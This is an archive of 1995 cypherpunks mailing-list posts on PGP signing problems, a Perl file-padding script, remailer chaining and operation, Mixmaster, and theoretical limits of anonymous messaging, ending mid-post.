> What we have here is a Markov chain.  We have accepting states and
> rejecting/retrying states.  Since the probabilities in the chain are
> independent of each other and are also time-invariant, the
> distribution of final probabilities is the same as the distribution of
> normalized accepting probabilities.
> 
> In simple terms, you can just retry until you get it right.  Since the
> probabilities are all the same before, they will all be the same
> after, only larger to account for the fact that some possibilities
> didn't work.
>  
> [re: rejection and retry]
> >This will only happen if k=t and m>=s.
> 
> That's right, and that means that for m < s you have valid k in
> [0,t+1) and for m >= s only for [0,t).  If you go back an look at the
> entropy expression, you'll see exactly this difference in relative
> probability for the two parts of [0,n).
>  
> >Now, it seems to me that the worst case for rejection is when n=L-1, in
> >which case t=1, s=1, and almost one-half of all initial SK choices will
> >be rejected.  
> 
> Right, but the worst case for rejection is not the same as the worst
> case for entropy loss, which occurs at n=L/2+1 and s=t-1, i.e. at the
> other end of the spectrum entirely.
>  
> >Following Eric's reasoning, this would be an effective loss
> >of one bit of key length, from say 1024 to 1023, which is tolerable.
> 
> Actually not.  The loss of effective key length happens based on the
> posterior distribution of the session keys, not on the number of
> rejections that happen in the process.
>  
> >Using this algorithm with the current Stealth PGP would produce a
> >"truly stealthy" version which I think would be indistinguishable from
> >random bytes without access to the receiver's private key.
> 
> Indeed.  Observe, though, that as far as deployment went, this would
> require modification to PGP itself for it to be anything like
> widespread.
>  
> Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sun, 5 Feb 95 19:02:57 PST
To: cypherpunks@toad.com
Subject: Re: signature validation on secure edit messages
Message-ID: <v01510104ab5b3e946aac@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Good point.  But if you turn word wrap off, your message will go out as one long line, or one long line for each paragraph.  Most smart mail programs will handle this cleanly, but I assume there are still many that won't.  Have all the people who are using PGP with Eudora been sending mail without line breaks?  Is this not a problem for 99.99% of the mail-reading software out there?

   --Dave.


At 5:28 PM 2/5/95, Joel McNamara wrote:
>Try turning Word Wrap off in Eudora.  I was encountering the same thing in the Windows version of Eudora.  With Word Wrap on, it seems to add CRs (or CR/LFs on a PC) to the end of each line upon sending.  This obviously causes a message not to match the signature, since all of those CRs weren't there when you composed it.  With Word Wrap off, your text still wraps on the screen when you're composing, but those unwanted CRs in the sent mail don't get added.
>
>Joel McNamara
>joelm@eskimo.com - finger for PGP key
>    
>>Jeez. I really don't know why the heck this always happens to me, my
>>digsigs not validating.
>>
>>You can finger me at tjbryce@amherst.edu to retrieve a message with a valid
>>signature.
>>
>>I always write the message in eudora, copy it, sign it in MacPGP as TEXT
>>with attached signature, then go back and paste it over the old message.
>>Then I go back to MacPGP and check the signature on the clipboard to be
>>sure - no problems. But after getting mailed, it doesn't work.
>>
>>Damn.
>>
>>Tom
>>

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLzWQLZeBqjXzSLLFAQHBbwP+OwhP/d7Yim3/GTY0sI3s17QY4ve+dH6K
UoxUboys/VuPFD60gYMdM8LrlxwQksRQm7JWxgp204crKucPZuyOO3ZpZyqiwAmx
23NMf5qtEmxJV5fCPQ8mh61vVeGXOuG7VUA1S+Q3yd7AmZw/PKOllF41VtfmPZvK
weRwnYmb7Ho=
=q+U5
-----END PGP SIGNATURE-----

--
Dave Mandl
dmandl@panix.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 5 Feb 95 22:04:34 PST
To: cypherpunks@toad.com
Subject: Re:  finney's perl scripts
Message-ID: <199502060603.WAA00621@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: anonymous-remailer@shell.portal.com
> hal , gotta question regarding your perl scripts .
>  i ran em thru sh and d/l'd em , and here are the
> results of my tests . first , i pgp'd a file in
>  binary format , then ran " perl pgppadt.pl
> test.pgp 10 " . the error i got was " Couldn't
>  create test.pgp.pad " . so i renamed the file to
> " test " and tried again with good results ! i got
>  " Input file test has size 732 bytes 10 bytes 
> pgppad returns code -3 " . then , iran " perl 
>  pgppad.pl test 10 " and after the bit about perl
> running under dos/4gw protected mode , i get dropped
>  to my command prompt . i took a look at the file ,
> and it's size wasn't any different , so i renamed the
>  file to test.pgp and ran it again and got the same
> results . so i guess i'm wonderin' if it added the
>  padding , or what might be the problem ? for your
> info , i'm using perl 4.0.

Unfortunately, my PC's disk died several months ago so I don't have one
right now.

pgppadt.pl sets the output file name with:
open (OUT, ">$ARGV[0].pad") || die ("Couldn't create $ARGV[0].pad\n");

This doesn't work on DOS since it appends .pad to the input file name so
it doesn't fit the 8.3 character format.

The other errors you are getting are probably due to the difference
between binary and ascii I/O mode on DOS.  I forgot about that
in my test script.  Try this revision of pgppadt.pl, and let me know if
it works on DOS:

----------------------cut here------------------------------
# Test program for pgppad.pl, showing how to use it.
# Revised 2/5/95 for DOS legality
# Usage: perl pgppadt.pl infile <bytes-to-add>
# Output file is infile, stripped of extensions, with .pad appended.

require 'pgppad.pl';
 
open (IN, $ARGV[0]) || die ("Couldn't open $ARGV[0]\n");
$outfile = $ARGV[0];
$outfile =~ s/\..*//;
open (OUT, ">$outfile.pad") || die ("Couldn't create $outfile.pad\n");
binmode IN;
binmode OUT;

$padding = $ARGV[1];
 
@stat = stat(IN);
$size = $stat[7];
print "Input file $ARGV[0] has size $size bytes\n";
print "Output file $outfile.pad will have size ",$size+$padding," bytes\n";
 
if (($code = &pgppad (IN, OUT, $size+$padding)) < 0) {
    die ("pgppad returns code $code\n");
}
 
close (IN);
close (OUT);
print ("Done\n");
----------------------cut here------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Sun, 5 Feb 95 20:30:56 PST
To: cypherpunks@toad.com
Subject: dna ink
Message-ID: <Pine.3.89.9502052222.B22385-0100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



I just saw an item on CNN about a company in LA called Art Guard.  It 
sells an ink that is created using your dna as a protection against 
forged signatures.

Interesting.

Dan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 5 Feb 95 22:58:47 PST
To: anonymous-remailer@shell.portal.com
Subject: Re: Judge not...
In-Reply-To: <199502060147.RAA25515@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9502052211.A8714-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


> [...]
> 
> Notification of 
> authorities external to the Net should be avoided. Contacts 
> to the Press should be left to those who have been trained in 
> public relations or have equivalent experience.

Seems thoroughly sane.
 
> How does the Judges' List work?
> 
> The List distributes messages to a panel of Judges who cancel 
> multiple posts to NetNews immediately. The List is used to 
> help Judges organize themselves, finalize policy, and set 
> procedures to enforce rules. It is primarily directed to 
> those who issue cancels.

In other words, it is a list for net vigilantes.

Sounds reasonable to me.  We need net vigilantes and we need
them to talk to each other.

Why should anyone object to this?

Enforcers are self appointed:  How else should anarchy work?
 

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 5 Feb 95 23:01:37 PST
To: cypherpunks@toad.com
Subject: re finney's perl scripts
Message-ID: <199502060700.XAA06256@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


hal sez ,

: The other errors you are getting are probably due to the difference
: between binary and ascii I/O mode on DOS.  I forgot about that
: in my test script.  Try this revision of pgppadt.pl, and let me know if
: it works on DOS:

works like a charm , thanks !




















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Sun, 5 Feb 95 21:07:50 PST
To: Johnathan Corgan <jcorgan@aeinet.com>
Subject: Re: Here we go again...
In-Reply-To: <Chameleon.4.01.950205084831.jcorgan@comet.aeinet.com>
Message-ID: <Pine.SV4.3.91.950205230508.28613A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 5 Feb 1995, Johnathan Corgan wrote:

>                   ***** SPECIAL ALERT *****
>  - Congress to consider making all system operators liable
>    for messaging content.  Bill would force employers to
>    monitor message content.              ACTION NEEDED NOW!
> <---------------------------------------------------------->

Anyone got the text of this bill? Good old thomas.log.gov wasn't too much 
help. It seemed to only list proposed changes to the bill.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Sun, 5 Feb 95 23:44:10 PST
To: cypherpunks@toad.com
Subject: Creating commercial acceptability for remailers?
Message-ID: <9502060742.AA01282@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


How can we convince _lots_ of people to run remailers,
assuming it can be made technically painless?
How can we spread remailer-operations beyond the cypherpunks and
fellow travellers and the privacy/paranoia businesses like
tax reduction and pharmaceutical retailers?

Suppose you were in the "Get Connected To The Net" consulting business,
and you wanted to include a remailer in the outside-the-firewall
part of the mail handler - how would you get companies to accept it?

What kinds of other businesses could benefit from providing anonymous service?

Some ideas for non-mundane businesses -
- Shrinks-r-us or other on-line recovery groups, beyond the current
	use in a.s.a.r.?
- Tax advice - one-shot anonymous returns so you can ask questions
	from the IRS or whatever without much risk of audit?
- Anonymous tips (the D.A.R.E. hotline?)  Arrrgh.	
- Whistleblowers.com?  (Who'd trust whistleblowers.gov?)
- For one-way anonymity, perhaps MTV could run an "email from Beavis" server,
	letting you send rude comments to your friends.
	Digitally signed, with optional MIME noises!
	Sending mail through it might put your address in an
	email junk-mail marketing list, but without tying it
	to the outgoing message?
	
But what about mundane businesses?  I've seen suggestion boxes
operated with minimalist anonymization for internal use
(no attempt to obscure the time or prevent logging, just header-zapping.)
University ombudsman's offices could be a good approach,
and might help get around the occasional reactive sysadmins.
But that's inside the firewall, though I suppose you could
use them for outgoing mail as well. 

Another use for inside-to-outside remailers is to preserve the privacy of
internal addresses, though that's more likely to need a service which 
replaces the originating headers with the real user's name, using some 
authentication to prevent forged email from the company president, etc.

Any suggestions on getting companies to accept outside-to-outside-capable
remailers on their gateways, or outside-to-inside?


		Anonymity is cool, heh,heh..
			Beavis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 6 Feb 95 00:00:52 PST
To: MIKEINGLE@delphi.com (Mike Ingle)
Subject: Re: New directions in anonymity (needed)
In-Reply-To: <01HMPLWWZOXU90B2L7@delphi.com>
Message-ID: <199502060743.XAA01417@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike Ingle wrote:
> 
> There has been a lot of talk about anonymity and the best ways of providing
> it recently. Anonymity now is about where cryptography was before Diffie and
> Hellman's paper, or untraceable transactions before Chaum. To use it, you
> have to trust someone, or at least a group of people.
> 
> All of our anonymous systems boil down to only two techniques: indirection
> and broadcast. Indirection is sending a message through one or more
> intermediate nodes to conceal its point of origin. Broadcast is sending a
> message to multiple recipients to conceal the intended recipient.

First, I think it important to clearly distinguish between "sender
anonymity," where the physical identity or sending site is hidden, and
"receiver anonymity," where the same is true of the receiving site.

Chaumian digital mixes--what you Americans call "remailers"--mainly
solves the sender anonymity problem. Message pools, or broadcast to a
group or site that includes the receiver, mainly deals with receiver
anonymity. The combination of the two deals with both.

Both are solved elegantly with the Dining Cryptographer's Protocol,
about which much is written on this list every few months. Messages
are "sent" in an Ouija-board fashion and received by the person who
can successfully decrypt a public message sent over the system.

The process can be made information-theoretically secure, with
one-time pads used instead of ciphers. But, as Mike Ingle points out
here, the process can be compromised if _enough collusion_ exists. Ah,
but so can all known systems!

Digital money is not untraceable if you're the only person in the
universe (or in _your_ uhiverse...same difference) who is using it, or
if the banks, shops, and other customers are in collusion, leaving you
as the one and only user. (Proof: The banks and shops are not actually
using digital cash, leaving the "mark"--pun intended--as the only
person merrily spending digital cash. Ergo, all purchases made with
digital cash are traceable to this mark. I can imagine contrived
situations in the early days of digital cash when this kind of set-up
occurs.) 

My intuition is that any cryptographic situation in which an
individual/entity can be "isolated" so that all other individuals and
entities, and all connections, can be compromised (added to the set of
colluders) will be "broken." How else could it be?

Anyway, I think DC Nets are every bit as secure as e-cash is.
Obviously the security depends on a bunch of things, but the concept
of anonymous communication is not weaker in any fundamental way than
is digital cash. Full collusion by everyone who is not "you" causes
big problems with any cryptographic system that I know of.

(Stuff about reply blocks elided. I agree that more work is needed to
understand attacks on reply block methods. However, I'm not at all
convinced that "tracking back" is any different from the conventional
approach of demanding input-output mappings at each level, by
subpoenaing the remailer's records, etc. But I'll think about this
some more and maybe comment at another times.)

> Broadcast is exactly as secure as it is nonscalable. If you broadcast to 100
> people, an attacker's uncertainty is one in 100. The security grows linearly
> with the overall bandwidth. For cryptographic-level security, it would need
> to grow exponentially with bandwidth.

This gets to the important point of _proving_ vs. _suspecting_. To
make this concrete, consider that 10,000 people may download the
entire contents of, say, "alt.anonymous," a message pool newsgroup
created largely for the publication of anonymous messages.

The Internetpol may _suspect_ that one of these 10,000 readers is the
person to whom the messatge is intended, but cannot _prove_ it. Even
if the list of readers is down around 100, I know of no legal systems
that would accept this as proof. (There are many issues here, and many
more detailed scenarios. For example, over the course of time, as
readership changes but some readers remain readers, patterns may
emerge from the noise. And there are issues of bandwidth. I am not too
worried about running out of bandwith soon, since an awful lot of text
messages can fit into just a single one of the MPEG or JPEG images
that flood the *.pictures newsgroups...and these *.picutures
newsgroups are sent to and locally stored on tens of thousands of
machines....) 

> Anonymity needs something fundamentally new, something comparable to public
> key for cryptography or blind signatures for digital cash. Suppose a server

I think you ought to carefully look at Chaum's work on Dining
Cryptographers. It does all this. (It ain't perfect, and it ain't been
implemented in practical terms, a la a "Pretty Good Dining
Cryptographers," but it's at least as basic a concept as the other
things are....some might say that all are variations on the same theme.)

> has a large file. A message comes in and is combined into this file. Another
> message comes in with a key to retrieve data. The server processes the
> retrieval key against this large file and comes up with an output, which it
> returns to the person doing the retrieving. This output contains the input
> message, transformed in such a way that even the server cannot match it
> to the input that produced it. This is what we need.

But how is this any less "suspcious" in terms of pointing to the
receiver than is the more general and easier process of simply
retrieving the file from the server? Why would doing some sort of
computation on the distant server make the act of access any less
incriminating.? If 100 people all retrieve the file, they're the
"suspects," despite nothing being provable. And if those 100 people
first tell the server to do some particulary transformation, they're
still equally suspect. (Unless they tell the server to use a chain of
remailers to do the retransmission to them, which is different from my
understanding here, and is in fact the "anonymous anonymous ftp" we've
long talked of.) And if fewer than the 100 people actually send the
message, then of course the list of suspect is even smaller. (The
advantages of passive, do-nothing broadcast are lost, a net lose.)

> It would require three keys: an encryption key, a selection key, and a
> decryption key. The sender uses the recipient's encryption key to encrypt
[stuff elided]

Be careful also not to assume the server is trustable, as I gather it
is presumed to be here. (Doing the transformations, and all.)

> A method like this would permit anonymity without trust, much as public key
> allows secrecy without trust and digicash allows transaction privacy without
> trust. Is there any way to do it? There are functions like the Fourier
> transform that can distribute data over a large file, but the inverse
> function gives you back the same data. We need the not-so-inverse function
> to give back a different piece of data, but one that can be converted, by a
> private key, into the original, which the server never sees.

I expect broadcast models, or anonymous anonymous ftp models, to be
more sophisticated than simple "publish everything in alt.anonymous"
strategies. That is, multiple routes, multiple places, hierarchies,
etc. All involve trade-offs in time, space, security, cost,
convenience.

Some methods may involve splitting files into multiple pieces for
independent retrieval. However, I am not really convinced that the
alleged problems are solved this way.

The point about "which the server never sees" is confusing to me.
Surely the server _could_ see the transformed data if he wanted to, as
he was the one who did the remote transformation (as I understand
Mike's scheme). (If the scheme involves a server which can do
transformations but not see the output, then this is a much harder
problem, dealing with models of computation, secure hardware, etc.)

(The idea of a sealed box which executes a model in which no records
are kept, etc., is of course Chaum's original 1981 concept of a
digital mix. No "key" need be sent by the recipient if in fact the box
executes the proper mix function, keeps no records, is not
compromised, etc. If Mike is suggesting that his "server" behave more
like a true digital mix and thus not be as dependent as on human
trust, then of course this is a good idea. We need more mix-like
boxes, for our remailings. This has nothing to with the broadcast
model per se, dealing as it does with the general mix issue.)

In any case, what difference does it make if the server sees the data
or file? He surely can track his internal CPU processes and know which
incoming file was sent out, and to which address! (Just the remailer
in-out mapping problem again, which has always been unconcerned with
the internal contents of files.)

Sorry for the length here.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay



















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 5 Feb 95 23:50:18 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Zimmermann charges NOT dropped
Message-ID: <v01510107ab5b7ff342ba@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:04 PM 2/5/95, Timothy C. May wrote:

>Anyway, my apologies. I sometimes think I am talking to the 20-30 of
>you who post regularly, and can thus feel free to ask about a report
>I've heard. But, as Hal Finney and others have also discovered, this
>is not the case...boundaries are changing in cyberspace.

Very true. I tend to forget that this list isn't just composed of the few
co-conspirators I sometimes tend to believe to know so well from their
postings.

 How was Monte Carlo? I used to live in Nice for some years and made it to
Monte Carlo once in a while. <Hmm, haven't been in Europe for years, London
is really nice in April. All the lawns are covered in daphodyls. Got to get
some tickets tomorrow.>


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 5 Feb 95 23:53:08 PST
To: cypherpunks@toad.com
Subject: Mixmaster supports PGP
Message-ID: <ab5b846d020210042dbd@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just wanted to officially announce the Mixmaster supports pgp encrypted
messages. I also want to plug using it as a second generation remailer
(that is why I wrote it). If you use a sun (that means you netcom folks),
get the front end from my home page.

Raph, please change the "mix" entry in your list to reflect pgp support.

Here is the Key:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy8y6PAAAAEEAJF05HUUQM4n9G5wHOZ+bHZbF6yFmeX5wBGElssHqUnbb4PQ
S/f8jWvJyfiZkjlOkzOEJ47fZ++x+yYWgzKGUKp2ejIKu2MvnzgLfIkwKfxioPXq
xgBpLcFaDrbM52Mi4MEpEYW4DJqxk9TrAnHZBwXmxpOZQ57UcgbmF1BLzawNAAUR
tC5NaXhtYXN0ZXIgUmVtYWlsZXIgPG1peG1hc3RlckBuYXRlbHkudWNzZC5lZHU+
iQCVAwUQLzLpflVkk3dax7hlAQH2GQP9FGBU7uGako4YghrUNzyb3tcdwZwsGkBx
Gy9MGojOSwWgXQ0CRLD9+IWgkZnRY902pU65C3IZhFB7erXBk5eyGOXhbahHv07o
mhHRiE2v4Z9hNapWVHHeDo0F2AoL7B8kkiFjXI2fVYzofB6gmXd7X8Wzh/9AEQsz
63U8X9cbajyJAJUDBRAvMulXBuYXUEvNrA0BAQOkA/9QfgNGLp6MX1Qwk55uLiHG
ajeT+Rtgruaj9DPOoZFVj9w0pImBkCQNw5eA6iZTgiAqkbSG7RaR9yKMU27Gf/O+
yz3cWAx4slFmCpVDlEl5qSa1Bd+2LuneN4EvnxfeI7TLUIFKlPcIOnx9zsu5Ny0I
SCtHVHBaGw43OT1OYmLjgA==
=Zr4D
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLzXU7lVkk3dax7hlAQHsrgP9G0NyW4RDvWOXa5BiWnr9gk6+Yq0bW0v8
gXZcn3tyzy3VAarmk09JLZOCnIADP9/zZXVEhJsXGDH/2O2j8IzBCCewCv9DnFcq
VnGtzwTHUdeLROSiOZYgwvhdtUgLdhB76c0akJhlNcVv7xMVEPRMqGtSMC/BPbTd
d9xUaQz/ibk=
=/0EA
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick -- henry strickland <strick@versant.com>
Date: Mon, 6 Feb 95 00:04:41 PST
To: Network Security Observations <NSO@delphi.com>
Subject: Re: The SKRONK protocols (version 0.6)
In-Reply-To: <01HMPOWDUA1M91MP0I@delphi.com>
Message-ID: <9502060806.AA07087@versant.com>
MIME-Version: 1.0
Content-Type: text/plain


THUS SPAKE Network Security Observations <NSO@delphi.com>:
# Henry,
# I would like to publish the working doc. in the next available issue 

Go ahead; I place the document in the public domain.

# of Internet Security Monthly. Obviously with a request to respond.

It would be kind if you sent me a copy of the issues that discuss it.
I'm not familiar with the journal.  If it's on paper, ask for my USPS address.

# Do you have any further material that you prefer to go along with it ?

Nope, that says what I have to say right now.  

The followup discussion on Cypherpunks has been helpful to me;
the punks mostly made good points and correct observations.  


		best regards, strick





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Mon, 6 Feb 95 00:23:33 PST
To: cypherpunks@toad.com
Subject: Remailer msgs ideath -> rebma don't work.
Message-ID: <199502060821.AA08985@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


Remailer messages sent via remailer@ideath.goldenbear.com to 
remailer@rebma.mn.org are failing; the system which handles my
mail upstream can't seem to connect to rebma. I'm going to try
to get things ironed out, but until then the ideath -> rebma path
should be avoided.

Sorry for any inconvenience; the bounced messages have been
discarded.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzXb4X3YhjZY3fMNAQErKgP+ND8r1sqXs3PXv87rL8IGTJ8j7FB4gmXI
YwDC3jNWHdOimVoK0zJS8utCAk9VlUDW7azXjBuXs+1qpMiygG9Nr7Up8iGaejM4
sV8906vU/+Hq+Dvd/fZn1tkfL7dB8qKUMpi7aNFz0YbadCvE79MYzLBuzUVKCJTm
j17jVq6tpX4=
=C3mW
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <MIKEINGLE@delphi.com>
Date: Sun, 5 Feb 95 22:17:10 PST
To: cypherpunks@toad.com
Subject: New directions in anonymity (needed)
Message-ID: <01HMPLWWZOXU90B2L7@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


There has been a lot of talk about anonymity and the best ways of providing
it recently. Anonymity now is about where cryptography was before Diffie and
Hellman's paper, or untraceable transactions before Chaum. To use it, you
have to trust someone, or at least a group of people.

All of our anonymous systems boil down to only two techniques: indirection
and broadcast. Indirection is sending a message through one or more
intermediate nodes to conceal its point of origin. Broadcast is sending a
message to multiple recipients to conceal the intended recipient.

Indirection is somewhat secure for anonymous-to-known messaging. Properly
done, all intermediate nodes must be compromised to reveal the anonymous
sender. It is entirely broken for allowing replies to an anonymous person.
To allow a reply, a traceable path must exist back to the anonymous person.
Having obtained whatever piece of data is used to send a reply, the attacker
can trace this back one node at a time. Kludge all you want, but there is no
good solution to this. You can make the path disappear when it is used, but
if the attacker gets it first, there is nothing you can do.

Broadcast is exactly as secure as it is nonscalable. If you broadcast to 100
people, an attacker's uncertainty is one in 100. The security grows linearly
with the overall bandwidth. For cryptographic-level security, it would need
to grow exponentially with bandwidth.

Anonymity needs something fundamentally new, something comparable to public
key for cryptography or blind signatures for digital cash. Suppose a server
has a large file. A message comes in and is combined into this file. Another
message comes in with a key to retrieve data. The server processes the
retrieval key against this large file and comes up with an output, which it
returns to the person doing the retrieving. This output contains the input
message, transformed in such a way that even the server cannot match it
to the input that produced it. This is what we need.

It would require three keys: an encryption key, a selection key, and a
decryption key. The sender uses the recipient's encryption key to encrypt
the message, then sends it to the server. The server mixes the message into
its file, but cannot identify the encrypted file as destined for a
particular recipient. The recipient's selecting key extracts the data, but
the data extracted does not resemble the data the sender sent. The
decryption key, kept private by the recipient, is necessary to return the
data to its original form. The server must be unable to link the data from
the sender to the data sent to the recipient, and this is the hard part.

A method like this would permit anonymity without trust, much as public key
allows secrecy without trust and digicash allows transaction privacy without
trust. Is there any way to do it? There are functions like the Fourier
transform that can distribute data over a large file, but the inverse
function gives you back the same data. We need the not-so-inverse function
to give back a different piece of data, but one that can be converted, by a
private key, into the original, which the server never sees.

						Mike

P.S. Have any of the "beta testers" actually tested RSAREF for Perl?
RSA gave me permission to call the random number and DES routines, so I am
ready to add that in and release the code.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 5 Feb 95 16:28:47 PST
To: cypherpunks@toad.com
Subject: Re: BROKEN REMAILERS
Message-ID: <199502060028.AA09342@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


In article <199502051758.MAA02142@bb.hks.net> nobody stated:

: I have tested remailers and their PGP keys over some time now and this is
: what I have found:	

: USURA is really quick too and has lately been reliable. But it has always
: suffered from the same problem as Nately, namely that it will truncate all
: of the remaining lines in a PGP message encrypted with its own public key,
: this making it impossible to chain effectively.  It will read the first 
: command only.  It DOES forward all attached files, however (by which I 
: mean text that have been tagged on OUTSIDE of the pgp block encrypted
: to Usura).

I did some testing myself and the format below did work for me:
(I encrypt using " pgp -eat ")

->

To: remailer@xs4all.nl

::
Encypted: PGP

----BEGIN PGP MESSAGE----
::
Anon-To: usura@replay.com

::
Encrypted: PGP

----BEGIN PGP MESSAGE----
::
Anon-To: usura@dds.nl

test of chained message
----END PGP MESSAGE----
----END PGP MESSAGE----

THIS IS OUTSIDE THE PGP MESSAGE

<-

This drops a message in my dds.nl mailbox stating:

->

test of chained message
THIS IS OUTSIDE THE PGP MESSAGE

<-


Hope this helps,
--
Alex de Joode					    
usura@replay.com	                            
http://www.xs4all.nl/~usura                PARTIE PIEPEL MOEF JOR FIET !!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 6 Feb 95 00:08:52 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: New directions in anonymity (needed)
In-Reply-To: <01HMPLWWZOXU90B2L7@delphi.com>
Message-ID: <199502060810.DAA27099@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike Ingle writes:
[...]
> Anonymity needs something fundamentally new, something comparable to public
> key for cryptography or blind signatures for digital cash. Suppose a server
> has a large file. A message comes in and is combined into this file. Another
> message comes in with a key to retrieve data. The server processes the
> retrieval key against this large file and comes up with an output, which it
> returns to the person doing the retrieving. This output contains the input
> message, transformed in such a way that even the server cannot match it
> to the input that produced it. This is what we need.
[...]

In a naive model, the sender could encrypt the message with two distinct 
public keys belonging to the intended recipient. The server shuffles the
result randomly with all its other messages. The recipient sends the private
key associated with the outer layer of encryption to the server, which in
turn finds something to decrypt with that key. Finally the recipient receives
the singly-encrypted message, and uses her other private key to decipher the
message. This still places full trust in the server, though.

It's trivial for the server to log each incoming message separately, noting 
the sender, in addition to combining it with the melange of all received 
traffic as expected. Thus the protocol above fails, since the server can
simply test-decrypt each distinct original file with the private key supplied
by the intended recipient, thereby linking the ends of the communication. 

So the function computed on the melange file and the recipient-supplied key 
must not do anything extraordinary when applied to the original message and 
the recipient key. Actually, it's much worse than that. The server could 
create a mock melange file, combine each original message with it, then apply
the extraction function to each resulting melange and the recipient key. Since
the recipient has no control over the previous state of the melange file, prior
to the arrival of the message for her, the extraction function can't depend in
any detailed way upon the contents of the melange. Therefore, I believe it's
impossible to specify an extraction function immune to melange spoofing by the
server.

-L. Futplex McCarthy, seeking summer employment in computer science; background
 mainly in theoretical CS, but open to many alternatives [private email please]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 6 Feb 95 00:47:19 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Legal implications of one-of-a-group guilt
In-Reply-To: <199502060743.XAA01417@netcom14.netcom.com>
Message-ID: <199502060849.DAA27258@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:		[welcome back, Tim]
> The Internetpol may _suspect_ that one of these 10,000 readers is the
> person to whom the messatge is intended, but cannot _prove_ it. Even
> if the list of readers is down around 100, I know of no legal systems
> that would accept this as proof.

Well, I'm not so sure. DNA fingerprinting has soared in popularity for
criminal cases over the last decade or so. From the figures I vaguely recall
being quoted, such evidence of a DNA match narrows down a list of
suspects to a mere few hundred thousand people, and is commonly admitted into
evidence. This situation is reminiscent of that phenomenon, IMHO.

I imagine that the looser standard of evidence in civil cases would make such
information quite significant in determining "the preponderance of evidence".

It would be interesting to hear from some folks with legal training on this 
issue, if only to correct my mistakes. IANAL.

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
